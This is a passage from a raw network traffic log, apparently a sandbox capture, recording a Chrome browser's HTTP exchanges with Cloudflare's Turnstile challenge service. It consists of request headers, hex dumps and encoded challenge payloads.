                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d00bc940f63-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 38 08 02 00 00 00 f5 b4 a6 11 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                  Data Ascii: PNGIHDR%8IDAT$IENDB`


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  20192.168.2.1649732104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/90211ce78d29726b/1736894272349/Y6BOUtUVqa43Gyq HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:55 GMT
                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d04ed56f795-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 38 08 02 00 00 00 f5 b4 a6 11 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                  Data Ascii: PNGIHDR%8IDAT$IENDB`


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  21192.168.2.1649733104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Length: 32473
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  CF-Challenge: l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC16384OUTData Raw: 76 5f 39 30 32 31 31 63 65 37 38 64 32 39 37 32 36 62 3d 76 38 68 78 33 65 4d 47 57 7a 38 44 38 44 49 38 4d 59 4d 7a 75 77 55 47 4d 73 4d 41 74 44 63 33 44 76 68 72 6c 44 6e 44 74 78 7a 68 44 70 44 6f 78 46 68 4d 67 44 48 78 66 6c 65 65 44 54 65 44 64 77 78 44 53 78 55 6e 44 38 24 6b 69 48 7a 44 62 39 65 37 7a 42 63 63 57 44 46 44 68 38 44 73 64 68 57 4d 70 4a 30 6e 31 6c 50 68 25 32 62 4e 44 36 6c 4d 4d 4e 78 64 48 44 6e 63 7a 33 37 77 44 36 77 65 2b 44 73 49 69 6d 57 68 44 44 6f 77 44 43 52 44 44 76 61 53 70 44 73 5a 49 44 4d 5a 67 4d 36 32 70 6e 24 78 44 41 78 30 65 75 62 66 6f 65 77 44 30 6e 78 50 2d 48 69 30 67 7a 46 62 6c 39 48 66 4d 65 68 6d 39 44 68 74 2d 6e 78 52 7a 63 53 77 39 6e 78 75 65 50 30 4e 63 44 53 2b 4e 76 69 67 45 64 75 49 24 2d 47 51
                                                                                                                                                                                                  Data Ascii: v_90211ce78d29726b=v8hx3eMGWz8D8DI8MYMzuwUGMsMAtDc3DvhrlDnDtxzhDpDoxFhMgDHxfleeDTeDdwxDSxUnD8$kiHzDb9e7zBccWDFDh8DsdhWMpJ0n1lPh%2bND6lMMNxdHDncz37wD6we+DsIimWhDDowDCRDDvaSpDsZIDMZgM62pn$xDAx0eubfoewD0nxP-Hi0gzFbl9HfMehm9Dht-nxRzcSw9nxueP0NcDS+NvigEduI$-GQ
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC16089OUTData Raw: 67 44 66 45 35 24 53 67 44 54 48 66 32 55 68 63 48 64 31 34 69 34 68 44 58 39 58 44 65 68 44 67 44 66 38 4d 6c 44 72 68 76 57 64 75 44 6d 6c 7a 77 65 49 44 45 7a 67 6c 64 75 44 43 78 65 77 64 4a 44 78 78 67 78 65 6e 44 54 44 58 41 4d 52 44 59 78 46 6c 44 78 44 47 78 73 24 65 6c 44 67 78 4d 57 4d 5a 44 44 78 58 57 64 41 44 2d 78 66 44 4d 62 78 66 78 76 6c 4d 43 44 75 44 68 38 44 6d 51 65 68 55 33 77 53 78 48 44 46 34 38 6c 49 62 78 53 39 65 53 44 48 77 55 6f 64 46 56 39 65 53 73 64 6e 59 31 59 55 44 4d 6c 78 6c 6b 37 38 4d 4c 39 2b 78 46 6e 65 42 79 6f 43 33 34 38 65 44 35 44 6c 44 66 68 44 5a 44 4d 78 65 6c 44 72 68 7a 56 44 77 4d 76 78 7a 77 44 52 49 32 44 46 75 68 62 41 33 44 76 6d 33 68 44 35 44 67 78 36 53 39 38 78 53 68 44 72 44 4d 52 58 78 66 2b 44
                                                                                                                                                                                                  Data Ascii: gDfE5$SgDTHf2UhcHd14i4hDX9XDehDgDf8MlDrhvWduDmlzweIDEzglduDCxewdJDxxgxenDTDXAMRDYxFlDxDGxs$elDgxMWMZDDxXWdAD-xfDMbxfxvlMCDuDh8DmQehU3wSxHDF48lIbxS9eSDHwUodFV9eSsdnY1YUDMlxlk78ML9+xFneByoC348eD5DlDfhDZDMxelDrhzVDwMvxzwDRI2DFuhbA3Dvm3hD5Dgx6S98xShDrDMRXxf+D
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:55 GMT
                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 26312
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cf-chl-gen: iKtnYsboTdeUl6KI8sCD+GTlzWqSY829zb27BlJXj2rC/S7sl13R9hUNggb67koj$vdistojiumbgRBleEto6+A==
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d059de25e6d-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1047INData Raw: 64 4c 71 55 66 38 43 68 71 72 57 35 70 72 4b 7a 74 38 47 4a 71 63 79 32 78 72 65 35 78 71 43 37 76 63 6e 42 30 4d 7a 4e 30 5a 48 4b 6e 64 71 38 75 72 79 5a 7a 36 79 62 6f 4e 32 6c 31 72 76 55 34 62 6e 67 72 61 2b 6a 36 2b 2b 39 79 2f 65 75 74 64 48 50 35 50 43 30 38 63 65 39 79 66 44 55 7a 39 48 62 38 50 7a 37 2f 4d 48 4b 2b 51 67 52 77 74 34 50 39 4f 37 78 33 76 54 59 34 52 67 58 39 4e 55 62 44 76 72 38 32 66 58 73 2f 76 58 65 2b 41 62 33 46 53 4c 6b 49 65 76 6d 4c 77 76 2b 42 65 63 6f 4d 76 67 51 4d 51 67 46 39 54 73 73 47 78 34 4c 4a 41 4d 79 42 55 49 65 41 43 49 66 54 43 49 6c 4c 7a 77 6e 54 30 59 64 51 69 35 45 4f 6c 64 52 4b 7a 68 65 4d 6a 46 64 51 54 52 64 54 56 6f 66 5a 6c 45 6e 51 47 46 56 50 53 31 5a 61 44 70 43 5a 69 39 71 59 44 56 46 64 6c 64
                                                                                                                                                                                                  Data Ascii: dLqUf8ChqrW5prKzt8GJqcy2xre5xqC7vcnB0MzN0ZHKndq8uryZz6yboN2l1rvU4bngra+j6++9y/eutdHP5PC08ce9yfDUz9Hb8Pz7/MHK+QgRwt4P9O7x3vTY4RgX9NUbDvr82fXs/vXe+Ab3FSLkIevmLwv+BecoMvgQMQgF9TssGx4LJAMyBUIeACIfTCIlLzwnT0YdQi5EOldRKzheMjFdQTRdTVofZlEnQGFVPS1ZaDpCZi9qYDVFdld
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 39 71 4d 75 54 71 34 32 68 32 4b 65 54 75 71 6d 73 31 61 2f 51 74 64 33 55 74 71 36 34 70 4b 4b 32 30 64 50 43 36 74 58 58 77 64 37 5a 32 38 58 4d 33 64 2f 4b 7a 74 69 30 79 4e 6e 4f 76 4e 6b 41 2f 4d 76 54 41 67 44 38 41 4e 6e 58 2f 4f 50 39 32 74 6b 47 41 74 37 63 41 75 2f 32 44 52 48 6b 46 67 7a 31 2b 4f 55 51 30 66 59 6a 47 50 6f 58 2f 42 49 57 2f 66 30 49 35 4f 6b 47 4b 51 41 75 4c 77 51 56 4c 44 41 78 38 79 59 6b 47 42 67 79 4f 52 49 4f 39 77 34 7a 39 55 55 30 4a 6a 63 71 4f 41 51 59 4a 79 55 5a 4a 43 30 6b 51 79 67 78 4a 43 51 71 4a 54 73 6d 58 42 77 34 45 55 6f 64 47 78 55 75 48 7a 30 36 5a 7a 78 6c 62 43 5a 6e 52 6b 4a 66 58 6d 4a 4c 56 57 68 56 4c 32 70 48 4d 6b 5a 78 5a 6e 68 54 62 32 35 79 65 57 31 50 56 55 4a 63 69 6d 52 7a 5a 6d 52 64 68 57
                                                                                                                                                                                                  Data Ascii: 9qMuTq42h2KeTuqms1a/Qtd3Utq64pKK20dPC6tXXwd7Z28XM3d/Kzti0yNnOvNkA/MvTAgD8ANnX/OP92tkGAt7cAu/2DRHkFgz1+OUQ0fYjGPoX/BIW/f0I5OkGKQAuLwQVLDAx8yYkGBgyORIO9w4z9UU0JjcqOAQYJyUZJC0kQygxJCQqJTsmXBw4EUodGxUuHz06ZzxlbCZnRkJfXmJLVWhVL2pHMkZxZnhTb25yeW1PVUJcimRzZmRdhW
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 6a 63 54 53 6d 70 71 63 6d 36 71 70 6d 38 44 64 31 62 4c 47 77 36 66 4a 73 71 58 44 71 4b 61 6d 75 73 58 74 35 4d 33 50 73 2b 79 30 35 64 43 78 75 2f 72 32 2f 64 65 79 79 76 69 37 7a 65 33 7a 77 4d 58 68 30 38 66 63 42 38 6a 59 44 39 2f 50 36 74 77 56 37 68 62 69 42 42 4c 6f 46 51 62 31 32 42 77 65 46 66 30 42 2b 43 48 64 4a 76 77 58 44 53 6f 6b 43 51 73 78 44 51 51 79 4b 77 2f 32 49 50 44 31 4c 2b 30 73 48 78 59 52 46 54 59 44 4c 50 30 31 50 6a 4d 5a 50 55 4d 72 51 54 63 4d 48 51 67 52 52 56 51 2b 55 56 4e 41 54 56 59 6e 52 53 74 53 4d 45 68 55 48 6c 63 57 56 46 55 2b 4f 54 31 66 4d 31 63 38 4a 69 39 59 5a 69 70 66 56 58 4a 73 55 44 52 54 61 46 6c 55 4f 54 63 34 53 6a 78 68 50 58 78 54 68 48 59 36 56 46 36 4c 67 32 64 33 6a 6b 31 65 63 32 61 4b 6b 32 56
                                                                                                                                                                                                  Data Ascii: jcTSmpqcm6qpm8Dd1bLGw6fJsqXDqKamusXt5M3Ps+y05dCxu/r2/deyyvi7ze3zwMXh08fcB8jYD9/P6twV7hbiBBLoFQb12BweFf0B+CHdJvwXDSokCQsxDQQyKw/2IPD1L+0sHxYRFTYDLP01PjMZPUMrQTcMHQgRRVQ+UVNATVYnRStSMEhUHlcWVFU+OT1fM1c8Ji9YZipfVXJsUDRTaFlUOTc4SjxhPXxThHY6VF6Lg2d3jk1ec2aKk2V
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 63 36 52 34 4d 2f 41 72 37 37 41 73 4c 76 45 76 39 71 2f 79 4c 2f 65 77 38 79 2f 34 73 66 4f 35 65 62 4c 30 75 58 71 7a 39 62 6c 79 39 44 63 34 64 58 7a 7a 4e 54 33 35 63 50 70 30 38 66 5a 43 74 33 70 36 38 73 4d 30 2b 6f 4c 46 39 2f 4b 42 51 51 53 30 78 44 64 35 39 62 38 34 75 48 36 46 78 37 6d 38 41 48 68 39 75 4d 43 37 43 6b 70 45 76 76 77 41 67 55 31 38 78 49 71 4e 51 77 59 4a 78 51 39 46 42 55 4e 51 78 63 55 4c 77 55 67 4b 7a 4d 49 53 69 39 4a 43 78 30 39 4b 6c 49 70 4e 69 41 74 55 78 4d 5a 4d 42 30 58 4a 78 64 67 51 44 6f 38 5a 6d 4a 6f 5a 6c 78 6d 58 54 38 33 51 53 30 71 54 31 70 63 54 44 31 65 59 45 39 33 59 6d 52 4f 61 32 5a 6f 55 6c 6c 71 62 46 64 62 5a 55 46 56 5a 6c 74 4a 5a 6f 79 4a 57 47 43 4f 6a 49 6c 4e 58 6d 4b 4a 6c 6f 70 6e 5a 70 4b 4f
                                                                                                                                                                                                  Data Ascii: c6R4M/Ar77AsLvEv9q/yL/ew8y/4sfO5ebL0uXqz9bly9Dc4dXzzNT35cPp08fZCt3p68sM0+oLF9/KBQQS0xDd59b84uH6Fx7m8AHh9uMC7CkpEvvwAgU18xIqNQwYJxQ9FBUNQxcULwUgKzMISi9JCx09KlIpNiAtUxMZMB0XJxdgQDo8ZmJoZlxmXT83QS0qT1pcTD1eYE93YmROa2ZoUllqbFdbZUFVZltJZoyJWGCOjIlNXmKJlopnZpKO
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 4f 66 35 4a 6d 77 79 4b 50 66 34 64 76 42 33 36 66 6b 76 71 58 79 76 75 76 71 77 74 6a 52 78 62 76 78 75 2b 79 36 32 73 4c 74 34 76 7a 47 38 4e 66 53 41 76 51 43 35 39 76 50 43 51 48 4e 33 63 38 4e 35 2b 38 56 44 78 50 6a 44 2f 54 75 44 76 55 59 41 42 4c 30 38 77 58 34 45 2b 6a 39 4c 42 63 48 37 42 37 2b 48 67 38 46 45 7a 51 6d 39 7a 4d 73 4f 41 55 33 4d 77 73 73 2b 77 73 32 4e 77 39 48 48 68 67 7a 50 52 5a 4c 48 79 41 76 52 43 41 77 49 6b 73 6c 44 6c 46 4e 54 31 59 31 53 79 77 38 4f 6b 68 5a 4f 44 39 50 4e 7a 73 69 58 69 52 65 57 6c 35 4e 4f 79 5a 63 50 32 31 6e 59 30 4e 79 52 32 35 5a 65 6c 5a 6c 64 47 31 32 61 48 59 2b 66 33 52 37 59 46 4a 34 51 7a 78 67 65 6d 75 4a 68 48 74 78 66 6e 36 48 63 33 52 66 69 6c 52 6a 55 35 4a 58 6a 56 47 4b 6c 6f 32 61 6c
                                                                                                                                                                                                  Data Ascii: Of5JmwyKPf4dvB36fkvqXyvuvqwtjRxbvxu+y62sLt4vzG8NfSAvQC59vPCQHN3c8N5+8VDxPjD/TuDvUYABL08wX4E+j9LBcH7B7+Hg8FEzQm9zMsOAU3Mwss+ws2Nw9HHhgzPRZLHyAvRCAwIkslDlFNT1Y1Syw8OkhZOD9PNzsiXiReWl5NOyZcP21nY0NyR25ZelZldG12aHY+f3R7YFJ4QzxgemuJhHtxfn6Hc3RfilRjU5JXjVGKlo2al
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 6f 31 64 6d 71 32 71 37 70 75 2b 72 74 39 65 4c 6c 73 72 48 77 34 39 76 50 39 65 6e 66 75 66 72 73 31 4d 48 37 38 64 66 43 34 50 4d 43 34 73 55 48 79 76 30 4a 44 2f 77 44 33 68 55 44 36 39 67 48 32 75 73 65 48 51 72 58 37 52 2f 69 47 65 41 6b 48 2f 63 66 4b 66 33 71 2b 52 30 50 49 53 6f 65 4c 53 6b 32 4a 52 63 78 4e 53 30 78 4b 54 30 74 49 66 30 37 4c 76 34 67 50 44 4d 48 50 67 64 4b 4c 45 73 58 54 43 51 4c 53 55 38 39 51 69 42 50 55 6c 70 48 53 68 63 57 56 55 68 41 4e 46 70 4f 52 42 35 66 55 54 6b 6d 59 46 59 38 4a 30 56 59 5a 6b 63 71 61 79 39 69 4d 33 52 6a 52 44 74 6f 4f 7a 63 2f 66 6a 35 33 54 6e 78 58 67 6c 42 2f 67 6f 70 33 65 6b 64 47 68 58 68 77 5a 49 70 2b 64 45 36 50 67 57 6c 57 6b 49 5a 73 56 33 57 49 6c 6e 64 61 6d 32 52 30 57 61 4b 49 6c 6d
                                                                                                                                                                                                  Data Ascii: o1dmq2q7pu+rt9eLlsrHw49vP9enfufrs1MH78dfC4PMC4sUHyv0JD/wD3hUD69gH2useHQrX7R/iGeAkH/cfKf3q+R0PISoeLSk2JRcxNS0xKT0tIf07Lv4gPDMHPgdKLEsXTCQLSU89QiBPUlpHShcWVUhANFpORB5fUTkmYFY8J0VYZkcqay9iM3RjRDtoOzc/fj53TnxXglB/gop3ekdGhXhwZIp+dE6PgWlWkIZsV3WIlndam2R0WaKIlm
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 75 2b 2f 49 30 4c 37 79 74 72 66 45 2b 4c 71 76 39 2f 33 54 38 62 77 43 37 74 54 50 42 74 75 2f 31 67 72 65 43 73 34 4f 35 4f 54 63 45 64 4c 50 33 78 55 54 38 39 41 55 32 74 66 70 48 2f 54 76 33 53 50 34 38 39 77 6c 49 2f 73 6b 4b 52 63 41 34 43 33 76 43 4f 77 7a 43 43 62 32 4e 67 73 32 2b 6a 66 36 39 76 51 39 4f 76 4d 44 51 67 51 52 44 30 41 48 42 77 74 4c 49 44 38 5a 54 55 6f 45 44 56 45 54 43 46 42 56 55 68 67 6d 57 7a 45 78 4b 46 34 67 4e 53 31 69 4e 32 49 5a 5a 7a 30 31 4e 47 6b 73 50 54 74 72 4d 44 30 39 62 44 4d 30 51 48 55 33 4c 43 31 37 55 44 63 35 66 55 42 59 66 49 4a 44 4f 45 4b 47 53 47 56 56 69 6d 42 2b 52 59 78 6a 6a 6c 4f 53 6a 33 46 69 6c 59 4a 58 54 5a 70 63 64 4a 69 65 58 31 39 5a 6f 59 35 67 63 61 61 69 61 48 61 6b 62 49 68 6c 72 70 71
                                                                                                                                                                                                  Data Ascii: u+/I0L7ytrfE+Lqv9/3T8bwC7tTPBtu/1greCs4O5OTcEdLP3xUT89AU2tfpH/Tv3SP489wlI/skKRcA4C3vCOwzCCb2Ngs2+jf69vQ9OvMDQgQRD0AHBwtLID8ZTUoEDVETCFBVUhgmWzExKF4gNS1iN2IZZz01NGksPTtrMD09bDM0QHU3LC17UDc5fUBYfIJDOEKGSGVVimB+RYxjjlOSj3FilYJXTZpcdJieX19ZoY5gcaaiaHakbIhlrpq
                                                                                                                                                                                                  2025-01-14 22:37:55 UTC1369INData Raw: 38 66 6b 38 38 37 35 32 66 4c 33 7a 2b 7a 37 31 67 4c 58 42 64 6e 62 42 50 76 31 44 63 41 48 79 77 59 4d 45 66 77 47 39 77 55 52 42 75 73 55 32 2b 66 51 47 50 45 56 31 42 76 66 47 69 41 6c 45 75 49 68 4a 4f 6a 66 37 52 30 5a 48 67 51 73 38 41 67 32 4a 2f 51 75 46 54 59 64 4c 69 41 76 2f 68 41 54 50 42 64 43 47 45 55 5a 53 6b 51 39 49 45 34 69 53 41 78 4f 45 6b 4e 4e 55 69 56 56 4b 42 4e 51 53 30 56 61 4d 56 67 7a 58 6a 42 68 4e 56 5a 67 57 44 78 71 4f 6d 51 6f 57 69 35 69 61 57 35 4e 63 55 51 76 62 47 68 78 64 6d 68 30 54 48 35 56 63 33 6f 30 62 59 46 55 50 33 78 36 67 59 5a 68 66 34 5a 41 65 59 68 6a 6a 6d 6d 48 6a 32 43 42 6c 57 68 54 6b 49 74 61 6d 6e 57 54 6d 32 79 4e 6e 48 65 69 66 5a 75 69 59 35 57 70 66 47 65 6b 6f 49 4f 75 69 61 65 75 62 36 47 77
                                                                                                                                                                                                  Data Ascii: 8fk88752fL3z+z71gLXBdnbBPv1DcAHywYMEfwG9wURBusU2+fQGPEV1BvfGiAlEuIhJOjf7R0ZHgQs8Ag2J/QuFTYdLiAv/hATPBdCGEUZSkQ9IE4iSAxOEkNNUiVVKBNQS0VaMVgzXjBhNVZgWDxqOmQoWi5iaW5NcUQvbGhxdmh0TH5Vc3o0bYFUP3x6gYZhf4ZAeYhjjmmHj2CBlWhTkItamnWTm2yNnHeifZuiY5WpfGekoIOuiaeub6Gw


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  22192.168.2.1649734104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:56 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:56 UTC442INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:56 GMT
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Content-Length: 14
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  cf-chl-out: F9gpOZstxO1Azy/nO6+6KSV66F3Kq4xZbCsMUxPcjojMdT1RZew/VPBecie4+0HhbUbe6363q5Q9I0z+nxERTg==$pPBy1TgpHVeg7/GdwpUgPw==
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211d0b5e9fc448-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:56 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                                                                                                                  Data Ascii: {"err":100230}


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  23192.168.2.1649738104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Length: 34869
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  CF-Challenge: l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:38:00 UTC16384OUTData Raw: 76 5f 39 30 32 31 31 63 65 37 38 64 32 39 37 32 36 62 3d 76 38 68 78 33 65 4d 47 57 7a 38 44 38 44 49 38 4d 59 4d 7a 75 77 55 47 4d 73 4d 41 74 44 63 33 44 76 68 72 6c 44 6e 44 74 78 7a 68 44 70 44 6f 78 46 68 4d 67 44 48 78 66 6c 65 65 44 54 65 44 64 77 78 44 53 78 55 6e 44 38 24 6b 69 48 7a 44 62 39 65 37 7a 42 63 63 57 44 46 44 68 38 44 73 64 68 57 4d 70 4a 30 6e 31 6c 50 68 25 32 62 4e 44 36 6c 4d 4d 4e 78 64 48 44 6e 63 7a 33 37 77 44 36 77 65 2b 44 73 49 69 6d 57 68 44 44 6f 77 44 43 52 44 44 76 61 53 70 44 73 5a 49 44 4d 5a 67 4d 36 32 70 6e 24 78 44 41 78 30 65 75 62 66 6f 65 77 44 30 6e 78 50 2d 48 69 30 67 7a 46 62 6c 39 48 66 4d 65 68 6d 39 44 68 74 2d 6e 78 52 7a 63 53 77 39 6e 78 75 65 50 30 4e 63 44 53 2b 4e 76 69 67 45 64 75 49 24 2d 47 51
                                                                                                                                                                                                  Data Ascii: v_90211ce78d29726b=v8hx3eMGWz8D8DI8MYMzuwUGMsMAtDc3DvhrlDnDtxzhDpDoxFhMgDHxfleeDTeDdwxDSxUnD8$kiHzDb9e7zBccWDFDh8DsdhWMpJ0n1lPh%2bND6lMMNxdHDncz37wD6we+DsIimWhDDowDCRDDvaSpDsZIDMZgM62pn$xDAx0eubfoewD0nxP-Hi0gzFbl9HfMehm9Dht-nxRzcSw9nxueP0NcDS+NvigEduI$-GQ
